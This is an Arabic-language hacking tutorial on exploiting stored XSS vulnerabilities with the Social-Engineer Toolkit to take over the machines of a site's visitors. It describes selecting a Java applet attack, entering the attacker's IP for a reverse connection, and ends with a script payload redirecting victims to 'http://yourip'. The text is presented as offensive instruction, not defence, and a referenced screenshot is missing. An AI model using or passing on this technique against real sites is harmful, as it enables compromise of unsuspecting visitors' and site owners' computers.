استغلال ثغرات XSS Stored باستخدام أداة SET

تعتبر ثغرات XSS Stored من أخطر الثغرات الأمنية في مجال الاختراق، لأنها تمكن المخترق من القيام بعدة تحكمات و اختراقات للأجهزة التي تتصفح الموقع المصاب، وقد يكون صاحب الموقع هو الآخر أحد هذه الضحايا.

في هذا المقال سوف نتطرق إلى كيفية استغلال تلك الثغرات بشكل احترافي و استخدام أداة SET الشهيرة لضمان نجاح استغلال هذا النوع من الثغرات الأمنية. 

نعرف أن هذا النوع من الثغرات يمكن أن يوجد في تطبيقات الويب من خلال زر التعليق أو إضافة موضوع أو غيرها.

بعد اختبار إذا كانت الثغرة موجودة - سواء يدويا أو من خلال أداة اختبار اختراق - ننتقل إلى كيفية استخدام أداة SET لاستغلال هذا النوع بطريقة احترافية.

 بعد تشغيل الأداة و الدخول إلى لوحة الخيارات المتنوعة عُد للقائمة الرئيسية.

بعد اختبار هذا النوع من الهجوم و الذي يستهدف مكون الچافا الموجود في المستعرض لدى المستخدمين، نقوم بوضع الـ IP الخاص بنا لعمل اتصال عكسي و كذلك استخدام تصميم محدد للعرض.

الخطوة الأكثر أهمية هي اختيار البايلود المناسب كما هو موضح في الصورة التالية:

بعدها عليك الذهاب إلى مكان اكتشاف الثغرة الأمنية و تطبيق البايلود الخاص بذلك.

<script>window.location="http://yourip"</script>